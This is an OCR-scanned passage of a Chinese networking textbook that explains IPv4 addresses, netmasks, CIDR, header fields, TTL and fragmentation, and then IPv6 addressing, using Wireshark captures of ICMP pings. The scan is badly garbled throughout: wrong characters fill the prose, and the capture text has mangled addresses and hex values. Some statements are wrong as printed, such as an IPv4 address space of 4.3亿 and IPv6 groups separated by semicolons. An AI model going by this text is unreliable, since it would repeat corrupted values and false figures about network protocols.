其 类 似 ， 第 3 层 则 负责 路 网 络 通 信 的 地 址 。 在 这 层 工 作 的 不 止 一 个 协 
议 ， 但 最 普遍 的 还 是 互联 网 协议 (IP) 。 互 联网 协议 有 两 种 版 本 ，IPv4 
和 IPv6。 在 此 ， 我 们 将 首先 介绍 在 RFC791 中 所 定义 的 IP 协 议 版 本 
4 (IPv4) 。 


7.2.1 互联 网 协议 第 4 版 “IPvVv4) 


要 想 明 白 IPv4 的 作用 ， 你 束 需 要 知道 流量 是 如 何在 人 不同 网 络 之 间 传 
得 的 。IPv4 是 这 一 通信 过 程 的 “搬运 工 ?， 并 且 不 管 通信 冰点 在 哪 ， 它 最 
终 邵 人 负 贡 在 设备 之 间 携 市 数据 。 


如 果 网 络 中 的 所 有 设备 仅 使 用 集 线 右 或 者 交换 机 进行 连接 ， 那 么 这 
个 网 络 称 为 局 域 刚 (local area network, LAN) 。 如 果 想 将 两 个 局 域 网 连 
接 起 来 ， 那 么 你 可 以 使 用 路 由 喜人 做 到 这 一 点 。 在 复杂 的 网 络 中 ， 可 能 包 
含 了 成 干 上 万 的 局 域 网 ， 而 这 些 局 域 网 则 是 由 世界 各 地 成 干 上 万 的 路 由 
右 和 连接 起 来 的 。 互 联网 本 映 束 是 由 无 数 局 域 网 和 路 由 堪 所 组 成 的 一 个 集 


全 
门 o 


1. IPv4 地 址 


IPv4 地 址 是 一 个 32 位 的 地 址 ， 用 来 唯一 标识 连接 到 网 络 的 设备 。 由 
于 让 人 记 住 一 串 32 位 长 的 01 字 符 确 实 比较 困难 ， 因 此 耻 地 址 采用 点 分 四 
组 的 表示 法 。 


在 点 分 四 组 表示 法 中 ， 构 成 IP 地 址 的 四 组 1 和 0 中 的 每 一 组 都 转换 为 
以 十 进 制 并 以 A.B.C.D 的 格式 表示 0 一 255 之 间 的 数字 〈 见 图 7-7) 。 我 们 
拿 这 样 一 个 IP 地 址 11000000 10101000 00000000 00000001 举 例 ， 这 个 值 


显然 不 容易 记忆 或 着 表示 ， 但 如 果 采 用 点 分 四 组 的 表示 法 ， 我 们 了 束 可 以 
将 其 表示 为 192.168.0.1。 
11000000 10101000 O00000000 0Q0000001 


| | | 
] 总 2 168 0 ] 


192.168.0.1 
图 7-7 IPv4 地 址 的 点 分 四 组 表示 法 


IP 地 址 之 所 以 会 被 分 成 4 个 单独 的 部 分 ， 是 因为 每 个 IP 地 址 都 包含 
着 两 个 部 分 : 网 络 地 址 和 主机 地 址 。 网 络 地 址 用 来 标识 设备 所 连接 到 的 
局 域 网 ， 而 主机 地 址 则 标识 这 个 网 络 中 的 设备 本 号 。 用 来 决定 究 苋 IP 地 
址 哪 部 分 属于 网 络 或 者 主机 的 划分 通常 并 不 唯一 。 这 实际 上 是 由 另 一 组 
名 为 网 络 掩 人 码 (network mask) 的 地 址 信息 所 决定 的 ， 有 了 时 它 也 会 被 称 
为 子 网 挫 码 (subnet mask) 。 


| 注 总 靖 晴 是 呈 时时 


在 本 书 中 ， 如 果 我 们 提 到 IP 地 址 ， 那 么 我 们 默认 是 指 IPv4 地 址 。 我 们 将 在 后 续 小 节 里 讲 
到 IPv6， 它 的 地 址 有 男 一 套 规则 。 无 论 何 时 提 到 IPv6 地 址 ， 我 们 都 会 明确 标注 出 来 。 





网 络 掩 但 用 来 标识 下 地 址 中 气 竟 哪 一 部 分 属于 网 络 地 址 而 哪 一 部 分 
属于 主机 地 址 。 网 络 掩 但 也 是 32 位 的 ， 并 且 网 络 掩 但 使 用 1 的 部 分 都 是 
网 络 地 址 ， 而 剩 下 为 0 的 部 分 则 标识 看 主机 地 址 。 


我 们 以 IP 地 址 10.10.1.22 为 例 ， 其 二 进 制 形式 为 00001010 00001010 
00000001 00010110。 为 了 能 够 区 分 出 IP 地 址 的 每 一 个 部 分 ， 我 们 将 网 络 
撞 码 应 用 其 上 。 在 这 个 例子 中 ， 我 们 的 网 络 掩 码 是 11111111 11111111 
00000000 00000000。 这 意味 着 IP 地 址 的 前 一 半 “10.10 或 者 00001010 
00001010) 是 网 络 地 址 ， 而 后 一 半 “1.22 或 者 00000001 00010110) 标识 
着 这 个 网 络 上 的 主机 ， 如 图 7-8 所 示 。 


10.10.1.22 一 00001010 O00001010 00000001 00010110 
-一 2 10.10.1.22 


220.225.0.0 一 1]1111111 11111111 OQ0000000 O00000000 Ne le le 


网 络 地 址 主机 地 址 


图 7-8 ”网络 掩 但 决定 了 了 地 址 中 比特 位 的 分 配 


如 图 7-8 所 示 ， 网 络 掩 人 码 也 可 以 写成 点 分 四 组 的 形式 。 比 如 网 络 掩 
码 11111111 11111111 00000000 00000000 可 以 被 写成 255.255.0.0。 


为 简便 起 见 ，IP 地 址 和 网 络 措 码 通常 会 外 写 成 无 类 型 域 则 选 路 
(Classless Inter-Domain Routing，CIDR) 的 形式 。 在 这 个 形式 下 ， 一 
个 完整 的 耳 地 址 后 面 会 跟 有 一 个 左 甜 枉 〈/) ， 和 斜 杠 右边 的 数字 表示 网 络 
部 分 的 位 数 。 举 例 来 说 ，IP 地 址 10.10.1.22 和 网 络 掩 码 255.255.0.0， 在 
CIDR 表 示 法 下 束 会 被 写成 10.10.1.22/16 的 形式 。 


2. ITPv4 头 


源 耻 地 址 和 有 目的 卫 地 址 都 是 IPv4 数 据 报头 中 的 重要 组 成 部 分 ， 但 除 
了 这 两 个 地 址 之 外 ， 数 据 包 里 面 还 有 其 他 重要 的 信息 。 卫 报头 比 我 们 刚 
刚 介 绍 过 的 ARP 数 据 包 要 复杂 得 多 。 这 其 中 包含 了 很 多 额外 的 信息 ， 以 
便 IP 协 议 完成 其 工作 。 


如 图 7-9 所 示 ，IPv4 头 有 奢 下 列 的 几 个 字段 。 
版 本 写 (Version) : IP 所 使 用 的 版 本 。 
首部 长 度 (Header Length) : 了 了 头 的 长 上 度 。 


服务 类 型 (Type of Service) :优先 级 标志 位 和 服务 类 型 标志 位 ， 
被 路 由 器 用 来 进行 流量 的 优先 排序 。 


总 长 度 (Total Length) : IP 汰 与 数据 包 中 数据 的 长 度 。 


互联 网 协议 4 (IPv4) 


We 0 | | [| 2 | 7 
5 | 5 mis WWE| Rum | BR 


| Hi | WW | 
EE EZ am 





图 7-9 ”IPv4 数 据 包 结构 


标识 符 〈Identification ) : 一 个 唯一 的 标识 数字 ， 用 来 识别 一 个 数 
据 包 或 者 被 分 厂 数 据 包 的 次 友 。 
标识 (Flags，〉: 用 来 标识 一 个 数据 包 是 售 是 一 组 分 斤 数 据 包 的 一 
部 分 。 

分 片 偏 移 (Fragment Offset) : 一 个 数据 包 是 一 个 分 片 ， 这 个 域 中 
的 值 束 会 被 用 来 将 数据 包 以 正确 的 顺序 重新 组 装 。 

存活 时 间 (Time to Live) : 用 来 定义 数据 包 的 生存 周期 ， 以 经 过 
路 由 堪 的 跳 数 / 秒 数 进 行 摘 述 。 


协议 〈Protocol) : 用 来 识别 在 数据 包 序 列 中 上 层 协议 数据 包 的 类 
型 。 


DK 


首部 校 验 和 “(Header Checksum ) : 一 个 错误 检测 机 制 ， 用 来 确认 
IP 汰 的 内 容 没 有 人 被 损坏 或 者 扯 改 。 


源 IP 地 址 (Source IP Address) : 发 出 数据 包 的 主机 的 IP 地 址 。 
目的 IP 地 址 (Destination IP Address) : 数据 包 目 的 地 的 IP 地 址 。 


选项 (Options〉: 你 留 作 和 额外 的 IP 选 项 。 它 包含 看 源 站 选 路 和 时 
间 惟 的 一 些 选 项 。 


数据 (Data) : 使 用 IP 传 圳 的 实际 数据 。 
3， 存活 时 间 


存活 时 间 (TTL) 值 定 义 了 在 该 数据 包 被 丢弃 之 前 所 能 经 历 的 时 
间 ， 或 者 能 够 经 过 的 最 大 路 由 数目 。TTL 在 数据 包 被 创建 时 就 会 被 定 
义 ， 而 且 通 篆 在 每 次 被 发 往 一 个 路 由 器 的 时 候 减 1。 举 例 来 说 ， 如 果 一 
个 数据 包 的 存活 时 间 是 2， 那 么 当 它 到 达 第 一 个 路 由 器 的 时 候 ， 其 TTL 
会 被 减 为 1， 并 被 发 向 第 二 个 路 由 。 接 着 这 个 路 由 会 将 TIL 减 为 0， 这 时 
如 果 这 个 数据 包 的 最 终 目 的 地 不 在 这 个 网 络 中 ， 那 么 这 个 数据 包 就 会 被 
丢弃 ， 如 图 7-10 所 示 。 由 于 TTL 的 值 在 技术 上 还 是 基于 时 间 的 ， 因 此 一 


个 非常 繁忙 的 路 由 器 可 能 会 将 TTL 的 值 减 掉 不 止 1， 但 通常 情况 下 ， 我 
们 还 是 可 以 认为 一 个 路 由 设备 在 多 数 情 况 下 只 会 将 TITL 值 减 1。 


/EN | 


[ TTL 2 一 | :3 ED TTL I :::: 国 | = 人 ( \ \ 


[ TL 3—w | 33: EET 2 :553 图- 于 国 一 一 ( 作 
i 3 Cr 3 Ce 、 


图 7-10 ”数据 包 的 TIL 在 每 次 经 过 一 个 路 由 右 的 时 候 减 少 


为 什么 TTEL 的 值 会 这 样 重要 ? 我 们 退 弟 所 关心 的 一 个 数据 包 的 生存 
周期 ， 只 是 其 从 源 击 往 目 的 地 所 花 去 的 时 间 。 但 是 孝 虑 到 一 个 数据 包 想 
要 通过 互联 网 友 往 一 台 主 机 需要 经 过 数 十 个 路 由 器 ， 在 这 个 数据 包 的 路 
径 上 ， 它 可 能 会 矶 到 被 钳 误 配置 的 路 由 硕 ， 而 失去 其 到 达 了 最 终 目 的 地 的 
路 径 。 在 这 种 情况 下 ， 这 个 路 由 硕 可 能 会 做 很 多 事情 ， 其 中 一 件 葡 是 将 
数据 包 友 同一 个 网 络 ， 而 产生 一 个 死 循环 。 


如 果 你 有 编程 痛 景 ， 那 么 你 就 会 知道 死人 循环 会 引 肥 各 种 问题 ， 一 上 般 
来 说 它 会 导致 一 个 程序 或 者 整个 操作 系统 的 半音 。 理 论 上 ， 同 样 的 事情 
也 会 以 数据 包 的 形式 发 生 在 网 络 上 。 数 据 包 可 能 会 在 路 由 器 之 间 持 续 循 
环 。 随 看 循环 数据 包 的 增多 ， 网 络 中 可 用 的 市 宽 束 会 减少 ， 直 全 拒绝 服 
务 pos, 的 情况 出 现 。IP 尖 中 的 TTL 域 束 是 为 了 防止 出 现 这 个 潜在 的 
问题 。 


让 我 们 看 一 下 Wireshark 中 的 实例 。 文 件 ip_ttl_source.pcap 包 含 着 两 
个 ICMP 数 据 包 。ICMP 我 们 会 在 这 章 之 后 介绍 到 〉 利用 IP 传 递 数 据 
包 ， 我 们 可 以 通过 在 Packet Details 面 板 中 展开 了 了 头 区 段 看 到 〈 见 图 7- 
11) 。 


你 可 以 看 到 IP 的 版 本 号 为 4，IP 汰 的 长 度 是 20 字 市 ， 首 部 和 和 载 何 的 
总 长 上 度 是 60 字 节 ， 并 且 TIL 域 的 值 是 128。 


ICMP ping 的 主要 目的 惑 是 测试 设备 之 间 的 通信 。 数 据 从 一 人 台 主 机 
肥 往 为 一 个 主机 作为 请 求 ， 而 后 接收 主机 会 将 那个 数据 作为 啊 应 友 回 。 


这 个 文件 中 ， 一 台 IP 地 址 为 10.10.0.3 的 设备 将 一 个 ICMP 请 求 发 向 了 地 址 
时 .0.128 的 设备 。 这 个 原始 的 捕获 文件 是 在 源 主 机 10.10.0.3 上 入 
| 建 的 。 


| Wireshark ,Packet 1 . ip_ttl_source 


> Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) 
> Ethernet II, Src: Hewlettp bf:91:ee (860:25:b3:bf:91:ee), Dst: Cisco-Li 66:71:95 (60:21:29:66:71:95) 
YY Internet Protocol Version 4, Src: 18.18.8.3, Dst: 192.168.8.128 
gl109 .... = Version: 4@ 
.... 8101 = Header Length: 28 bytes © 
> Differentiated Services Field: 8x88 (DSCP: CS8@, ECN: Not-ECT) 
Total Length: 69 
Identification: 8x728d (29325) 
> Flags: 0x88 
Fragment offset: @ 
Time to live: 128 ©@ 
Protocol: ICMP (1) 
> Header checksum: 8x8888 [validation disabled] 
Source: 19.-19.9.3 © 
Destination: 192.168.8.128 [6) 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 
> Internet Control Message Protocol 











Na. 1 * Time: IDD ' Sourcer 10.10.0.3 " Destination: 192. 168.0 128 " Prooeol: TCD " Length: 24 " Infor Echo (ping) reqvest iD seq=3 7 /94 72 t=128 {reply in 2) 





图 7-11 源 数 据 包 的 IP 头 


现在 打开 文件 ip_ttl_dest.pcap。 在 这 个 文件 中 ， 数 据 在 目的 主机 
192.168.0.128 处 被 捕 获 。 展 开 这 个 捕获 中 第 一 个 数据 包 的 了 PP 头 ， 来 检 和 奏 
它 的 TIL 值 〈 见 网 7-12 ) 


| Wireshark . Packet 1 . ip_tt|_dest 


> Frame 1: 74 bytes on wire (592 bits)，74 bytes captured (592 bits) 
Ethernet II, Src: Cisco-Li 66:71:94 (88:21:29:66:71:94), Dst: Dell c8@:56:f8 (88:21:70:c8:56:f8) 
v Internet Protocol Version 4, Src: 18.18.8.3, Dst: 192.168.8.128 
B168 .... = Version: 4 
-。 人 191 = Header Length: 28 bytes 
> Differentiated Services Field: 8x8@8 (DSCP: C58, ECN: Not-ECT) 
Total Length: 68 
Identification: @x728d (29325) 
> Flags: 8@x868 
Fragment offset: 9 
Time to live: 127 各 
Protocol: ICMP (1) 
> Header checksum: 9xfdfe [validation disabled] 
Source: 18.18.8.3 
Destination: 192.168.8.128 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown ] 
> Internet Control Message Protocol 


No.: 1 * Tame: 0.000000 - Source: 10.10,.0.3 - Destination: 192.168.0,128 - Protocol: IC.. " Length: 74 * Infor Echo {ping) request id=00001, seq=27/9472, tt=127 [reply in 





图 7-12 ”IP 汰 告诉 我 们 TTL 己 经 被 减 1 了 


你 可 以 立刻 注意 到 TTL 的 值 变 为 了 127， 比 原先 的 TTL 减 少 了 1。 妈 
使 不 知道 网 络 的 结构 ， 我 们 也 可 以 知道 这 两 台 设 备 是 由 一 台 路 由 器 隔 开 
的 ， 并 且 经 过 这 台 路 由 器 的 路 径 会 将 TIL 值 减 1。 


数据 包 分 厂 将 一 个 数据 流 分 为 更 小 的 片段 ， 它 古 IP 用 于 解决 跨越 不 
同类 型 网 络 时 可 徘 传 输 的 一 个 特性 。 


一 个 数据 包 的 分 请 主 要 基于 第 2 层 数 据 链 路 协议 所 使 用 的 最 大 传输 
单元 (maximum transmission unit MTU ) 的 大 小 ， 以 及 使 用 这 些 第 2 层 
协议 的 设备 配置 情况 。 在 多 数 情况 下 ， 第 2 层 所 使 用 的 数据 链 足 协议 是 
以 太 网 。 以 太 网 的 默认 MTU 是 1500， 也 就 是 说 以 太 网 的 网 络 上 所 能 传 
输 的 最 大 报 文 大 小 是 1500 字 节 《并 不 包括 14 字 节 的 以 太 网 头 本 喘 ) 。 


[ 注 疙 有 


虽然 存在 着 标准 的 MTU 设 定 ， 但 是 一 个 设备 的 MTU 通 常 可 以 手工 设 定 。MTU 是 基于 接 
口 进行 设 定 的 ， 其 可 以 在 Windows 或 者 Linux 系 统 上 修改 ， 也 可 以 在 托管 路 由 器 的 界面 上 修 
改 。 





当 一 个 设备 准备 传输 一 个 IP 数 据 包 时 ， 它 将 会 比较 这 个 数据 包 的 大 
小 ， 以 及 将 要 把 这 个 数据 包 传 送出 去 的 网 络 接口 MTU， 用 以 决定 是 盏 
需要 将 这 个 数据 包 分 片 。 如 果 数 据 包 大 小 大 于 MTU， 那 么 这 个 数据 包 
瓯 会 航 分 片 。 将 一 个 数据 包 分 片 包括 下 列 的 步骤 。 

(1) 设备 将 数据 分 为 厂 干 个 将 要 接 下 来 进行 传输 的 数据 包 。 

(2) 每 个 了 了 头 的 总 长 度 字 段 会 被 设置 为 每 个 分 请 的 请 段 长 度 。 

(3) 除了 最 后 一 个 分 片 数据 包 外 ， 之 前 所 有 分 片 数据 包 的 标志 位 
都 被 标识 为 1。 

(4) IP 头 中 分 厂 部 分 的 分 厂 仿 移 将 会 被 设置 。 

(5) 数据 包 被 发 送出 去 。 

文件 ip_frag_source.pcap 古 从 地 址 为 10.10.0.3 的 计算 机 上 捕获 而 来 
的 。 它 向 一 个 地 址 为 192.168.0.128 的 设备 发 送 ping 请 求 。 注 意 ， 在 


ICMP (ping) 请 求 之 后 ，Packet List 面 板 的 mfo 列 中 列 出 了 两 个 被 分 段 
的 IP 数 据 包 。 


先 检 查 数 据 包 1 的 IP 头 ( 见 图 7-13) 。 


| Wireshark ' Packet 1 .ip_frag_source 





> Frame 1: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits) 
> Ethernet II, Src: HewlettP bf:91:ee (880:25:b3:bf:91:ee), Dst: Cisco-Li 66:71:95 (80:21:29:66:;71:95) 
Y Internet Protocol Version 4, Src: 19.19-9-3，Dst: 192.168.9.128 
= Version: 4 
. Bl91 = Header Length: 28 bytes 
> Differentiated Services Field: 8x88 (DSCP: CS8, ECN: Not-ECT) 
Total Length: 1588 
Identification: @x7474 (29812) 
Flags: 8x81 (More Fragments) 
= Reserved bj 让; Not set 
. = Don't fragment: Not set 
.1. ...。 = More fragments: Set OO 
Fragment offset: 9 © 
Time to live: 128 
Protocol: ICMP (1) 
” Header checksum: 09xB666 [validation disabled] 
Source: 19.19.0.3 
Destination: 192.168.8.128 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 
Reassembled IPv4 in frame: 3 
> Data (1489 bytes) 











No.: 1 * Time: Q.O00000 - Sowurce: 10.10.0.3* Destinsbion: 192,158.0.128 " Proiceol: [ID 1514 - Info: Fragmented JP proioeo (oroio= EONMP 1, of=0, ID=7474) [Resssembled in 


Close Hap | 





图 7-13 ”更 多 分 亡 和 分 睫 俩 移 值 可 以 用 来 识别 分 万 数据 包 


根据 更 多 分 片 和 分 所 仿 移 域 ， 你 可 以 断定 这 个 数据 包 是 分 睫 数 据 包 
的 一 部 分 。 衫 分 片 的 数据 包 可 能 有 一 个 大 于 0 的 分 请 俩 移 ， 或 者 设 定 了 
要 多 分 所 内 标志 位 ，。 在 第 一 个 数据 包 中 ， 蝎 多 分 片 标志 位 个 设 定 ， 意 味 
看 接收 设备 应 该 等 人 sii 4A ph a i 分 请 俩 移 航 议 为 0， 
意味 痢 这 个 数据 包 古 这 一 系列 分 睫 中 的 第 


第 二 个 数据 包 的 卫 头 〈 见 图 7- 14) ， 同样 被 设 定 了 更 多 分 厂 的 标志 
位 ， 但 在 这 里 分 厂 偏 移 的 值 是 1480。] 这 里 明显 意味 着 1500 字 节 的 
MTU， 减 去 了 IP 头 的 20 字 节 。 


三 Wireshark .Packet 2 .ip frag source 


> Frame 2: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits) 
> Ethernet II, Src: HewlettP_ bf:91:ee (88:25:b3:bf:91:ee), Dst: Cisco-Li 66:71:95 (80:21:29:66:71:95) 
Y Internet Protocol Version 4, Src: 18.18.8.3, Dst: 192.168.8.128 
8180 .... = Version: 4 
， 8191 = Header Length; 28 bytes 
> Differentiated Services Field: 8x88 (DSCP: CS8, ECN: Not-ECT) 
Total Length: 1500 
Identification: 9x7474 (29812) 
Flags: Ox81 (More Fraements) 
0... .... = Reserved bit: Not set 
.9-. -... = Don't fragment: Not set 
.-1. .... = More fragments: Set © 
Fragment offset: 1480 他 
Time to live: 128 
protocol: ICMP (1) 
> Header checksum: 0x6006 [validation disabled] 
Source: 19.19.9.-3 
Destination: 192.168.8.128 
[Source GeoIP: Unknown] 
[Destination GeoIP; Unknown] 
Reassembled TPv4 in frame: 3 
> Data (148@ bytes) 








No 2 " Time: 0.000010 * Source: IQ 10.0,3 * Destination: 192,168,0.128 " Protocol: IPY4 .. 1514 fr Fragmented JP protoco (protp=1CNMP 1, of= 1480, ID=7474) [Reassembiyed i 


Coe me 





图 7-14 ”分 片 偶 移 值 会 根据 数据 包 的 大 小 而 增 大 


第 三 个 数据 包 《〈 见 图 7-15) ， 并 没有 设 定 更 多 分 片 标志 位 ， 也 融 意 
味 看 它 锐 标记 为 整个 数据 流 中 的 最 后 一 个 分 片 。 并 且 其 分 厂 偏 移 被 设 定 
为 2960， 也 就 是 1480+ (1500-20) 的 结果 。 这 些 分 片 可 以 被 认为 是 同一 
did 列 的 一 部 分 ， 因 为 它们 在 IP 头 中 的 标识 位 字段 中 拥有 相同 的 


量 Wireshark . Packet 3 . ip_frag_source 





Frame 3: 582 bytes e (4656 bits), 582 bytes captured (Co bits) 
Ethernet II, Src: H op i bf:91:ee (80:25:b3:bf:91:ee), Dst -Li 66:71:95 (80:21:29:66:71:95) 
Y Internet Protocol Ver pr pe Dst: 192.168.0.128 
808188 .. = Version: 4 
:+». 8B181 = Header Length: 28 bytes 

» Differentiated Services Field: 8x88 (DSCP; CS8, ECN: Not-ECT) 

Total Length: 568 

Identification: @x7474 (29812) 各 


nt offset: 2968 © 
to live: 128 
otocol: ICMP (1) 
ea checksum: 8x8888 [validation disabled] 
ce: 19.19.9.3 


ination: 192.168.9.128 
e GeoIP: Un known ] 
n GeoIP: Unkno 
: 本 IPv4 Fragments es po s): #1(1480), #2(1488), #3(548)] 
Internet Control Message Protocol 











No,: 3 " Timer: 0 OODI3 * Sowurcer 10.10.0.3 * Destination: 192,.168.0,128 * Protocol ICMP * Lengths S82 * Inio: Echo {ming) request id=th O001, seq=5 "14592, t=128 (repiy in 





图 7-15 ”没有 设置 更 多 分 片 标志 位 意味 着 这 是 最 后 一 个 分 片 


里 然 网 络 上 人 被 分 片 的 包 不 起 么 常见 ， 但 明日 数据 包 为 什么 会 侯 分 片 
iil 这 样 当 过 到 它们 时 ， 你 束 可 以 诊断 问题 所 在 或 认 出 丢失 的 分 


7.2.2 ”互联 网 协议 第 6 版 〈IPv6 ) 


当 制 定 IPv4 规 范 时 ， 我 们 其 实 并 不 知道 今天 最 终 有 多 少 个 连接 到 互 
联网 的 设备 。IPv4 的 最 大 地 址 空 z 间 仅 人 允许 有 4.3 亿 个 地 址 。 但 实际 上 减 去 
特殊 用 途 的 预 留 地 址 ， 比 如 测试 地 址 、 广 播 地 址 、RFC1918 内 网 地 址 
等 ， 实 际 可 用 的 地 址 空间 更 加 有 限 。 尺 管 已 经 实施 了 一 些 延 绥 IPv4 地 址 
耗 尽 的 措施 ， 解 决 这 一 问题 的 唯一 途径 还 是 要 再 开发 IP 规 范 的 新 版 本 。 


于 是 ，IPV6 的 第 一 个 版 本 一 RFC 2460 于 1998 年 发 布 。 这 一 版 提供 


了 一 些 性 能 上 的 改进 ， 包 括 更 大 的 地 址 空间 。 在 这 一 小 节 里 ， 我 们 将 学 
习 IPv6 的 报 文 结构 和 它 不 同 以 往 的 通信 方式 。 


1. IPv6 地 址 


IPv4 地 址 被 局 限 在 32 位 ， 这 意味 看 该 长 度 只 能 提供 亿 级 的 地 址 至 
间 。IPVv6 地 址 有 128 位 ， 可 以 提供 2 的 128 次 方 的 地 址 空间 (万 亿 万 亿 万 
亿 级 别 ) 。 这 一 升级 十 分 可 观 ! 


因为 IPv6 地 址 是 128 位 的 ， 所 以 用 二 进 制 表示 就 不 太 方 便 了 。 在 大 
多 数 情况 下 ，IPv6 地 址 用 8 组 2 字 节 的 十 六 进 制 数 表 示 ， 每 组 用 分 号 隔 
开 。 举 个 简单 的 例子 ， 一 个 IPv6 地 址 就 像 这 样 ; 





1111:aaaa:2222:bbbb:3333:cccc:4444:dddd 


当 一 眼 扫 过 IPv6 地 址 时 ， 你 的 想法 可 能 跟 那 些 习惯 于 记忆 IPv4 地 址 
的 人 一 样 : IPv6 地 址 看 起 来 不 可 能 记 住 。 这 也 是 换取 更 大 地 址 空间 的 不 
对 代价 。 


不 过 IPv6 地 址 记 法 的 一 个 特性 是 一 些 值 为 0 的 组 可 以 省 略 。 比 如 ， 
考虑 以 下 的 IPv6 地 址 : 





1111:0000:2222:0000:3333 :4444:5555 :6666 


你 可 以 省略 挥 其 中 全 是 0 的 一 个 组 ， 让 0 不 可 见 ， 束 像 这 样 : 


1111::2222:060060600:3333:4444:5555:6666 





然而 ， 你 一 次 只 能 省 略 一 个 值 为 0 的 组 ， 所 以 下 面 的 地 址 是 无 效 
的 : 





1111::2222::3333:4444:5555:6666 


还 有 一 种 简化 的 方法 就 是 把 IPv6 地 址 前 置 的 0 都 省 略 挤 。 考 虑 下 面 
这 个 例子 ， 第 4 组 、 第 5 组 、 第 6 组 前 面 都 有 0: 





1111:060060:2222:06333:606844:060865:ffff:ffff 


你 可 以 通过 下 和 面 的 方式 更 有 效 地 表示 地 址 : 





1111::2222:333:44:5:ffff:ffff 


这 可 能 没有 IPv4 地 址 那么 易 用 ， 但 起 人 码 比 更 长 的 地 址 好 处 理 得 多 。 


一 个 IPv6 地 址 分 为 网 络 部 分 和 主机 部 分 ， 分 别称 为 网 络 前 级 
(network prefixz) 和 接口 标识 从 (interface identifier) 。 这 两 个 部 分 在 
地 址 上 的 分 布 取 雇 于 IPv6 的 通信 类 型 。IPv6 通 信 有 3 种 类别 : 单 播 
(unicast) 、 任 播 (anycast) 和 多 播 Cmulticast) 。 在 大 多 数 情况 下 ， 
你 应 该 会 过 到 本 地 连接 之 间 的 单 播 ， 束 是 在 单一 网 络 中 的 一 个 设备 和 夯 
一 个 设备 的 通信 。 单 播 本 地 连接 的 IPv6 格 式 如 图 7-16 所 示 。 


补 码 
一 一 天 一 一 
fe80:0000:0000:0000:7a31:c1ff:fecb:b256 
a 
前 组 接口 标识 符 


图 7-16 单 播 本 地 连接 的 IPv6 地 址 的 组 成 部 分 


在 同一 网 络 下 和 男 一 个 设备 通信 和 需要 用 到 本 地 连接 地 址 。 一 个 本 地 
连接 地 址 的 前 10 个 最 高 有 效 位 被 设置 为 1111111010， 紧 接着 的 54 位 被 设 
置 成 0。 所 以 ， 当 你 看 到 一 个 地 址 的 前 半 部 分 是 fe80:0000:0000:0000 时 ， 
你 就 可 以 认 出 这 是 一 个 本 地 连接 地 址 。 


本 地 连接 IPv6 地 址 的 另 一 半 是 接口 ID 部 分 ， 它 表明 了 在 网 络 上 唯一 
的 一 个 主机 端点 。 在 以 太 网 中 ， 这 是 基于 MAC 地 址 而 来 的 。 然 而 ， 
MAC 地 址 只 有 48 位 。 要 把 64 位 全 部 填 满 ，MAC 地 址 先 被 切 成 两 半 ， 然 
后 值 0xfffe 在 两 边 被 当 作 补 人 码 附属 上 ， 组 成 一 个 唯一 的 标识 符 。 最 后 ， 
反 转 第 一 个 字 节 的 第 7 位 比特 。 这 可 能 稍 显 复杂 ， 但 请 看 图 7-17 所 示 的 
接口 DD。 原 设备 的 MAC 地 址 是 78:31:c1l:cb:b2:56。 字 节 0xfffe 先 被 加 到 中 
间 ， 然 后 通过 反 转 8 变 成 了 a。 


补 码 

人 ~\ 
7q31:c1lff:fecb:b256 
一 一 一 —o— 


MAC 地 址 MAC 地 址 
(前 半 段 ) (后 半 段 ) 


图 7-17 接口 ID 由 MAC 地 址 和 补 码 演变 而 来 


IPV6 地 址 簇 可 以 用 CIDR 的 记 法 来 表示 ， 与 IPv4 地 址 艇 记 法 相似 。 由 
在 本 例 中 ，64 位 的 地 址 空间 被 表示 为 一 个 本 地 连接 地 址 : 


fe80:06000600:0600600:0600060:/64 


当 单 播 流量 在 公 网 上 传播 时 ，IPv6 地 址 的 组 成 会 发 生变 化 〈 见 图 7- 
18) 。 当 使 用 这 种 方式 时 ， 全 局 单 播 通过 将 前 3 位 设置 为 001， 加 上 45 位 
全 局 路 由 前 级 来 标识 。 全 局 路 由 前 级 由 互联 网 数字 分 配 机 构 (IANA) 
分 配 ， 它 可 以 唯一 地 标识 一 个 组 织 的 地 址 空间 。 接 下 来 的 16 位 是 子 网 
ID， 它 可 以 用 来 划分 地 址 ， 类 似 于 IPv4 地 址 的 子 网 掩 码 。 最 后 64 位 被 用 
ee SR OR UO RR 
而 发 生变 化 。 


网 络 朋 绥 
/一 一 一 一 一 全 ~~ 
2001:4860:4860:0000:7a31:c1ff:fecb:b256 
一 
路 由 器 前 组 子 网 ID 接口 标识 符 


图 7-18 全 局 IPv6 单 播 地 址 的 组 成 部 分 
和 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
从 视觉 上 区 分 IPv4 和 IPv6 地 址 是 很 容易 的 ， 但 是 对 于 很 多 程序 来 说 并 没有 那么 简单 。 如 


果 你 需要 指定 一 个 IPv6 地 址 ， 比 如 一 些 类 似 于 浏览 器 和 命令 行 工 具 的 应 用 要 求 你 在 地 址 两 劳 
加 上 中 括号 ， 类 似 [1111::2222:333:44:5:ffffl]。 这 样 的 需求 并 不 总 是 有 文档 说 明 ， 从 而 引出 的 








问题 会 让 许多 IPv6 的 学 习 者 非 冲 泪 浆 。 





2. IPv6 包 结构 


IPV6 的 报头 在 易 读 的 设计 理念 下 已 经 扩展 到 支持 更 多 的 特性 。 握 茎 


了 报头 要 提供 一 个 大 小 值 的 设计 ，IPv6 报 头 现在 被 固定 在 40 字 节 。 人 额外 
的 选项 通过 拓展 报头 来 实 更。 这样 设 计 有 和 它 的 好 处 ， 大 多 效 路 由 需 转 友 
数据 包 只 需要 处 理 40 字 贡 的 报头 。 


如 图 7-19 所 示 ，IPv6 报 头 分 为 以 下 部 分 。 


互联 网 协议 第 6 版 (IPv6) 
RR 0 | | | 2 
| 0 | mrs | Wain 
| 





92 
目的 地 址 


图 7-19 ”IPv6 包 结构 
版 本 号 : IP 协 议 的 版 本 (这 里 IPv6 值 永远 是 6) 。 


沈 量 优先 级 : 用 于 QoS《 服 务 质 量 ) 中 区 分 特定 流量 的 优先 级 次 
序 。 


流标 签 : 源 用 来 标识 同一 个 法 里 面 的 报 文 ， 这 个 部 分 通常 使 用 在 
QoS 知 理 中 来 确认 报 文 来 目 于 同一 路 径 的 同一 流 。 


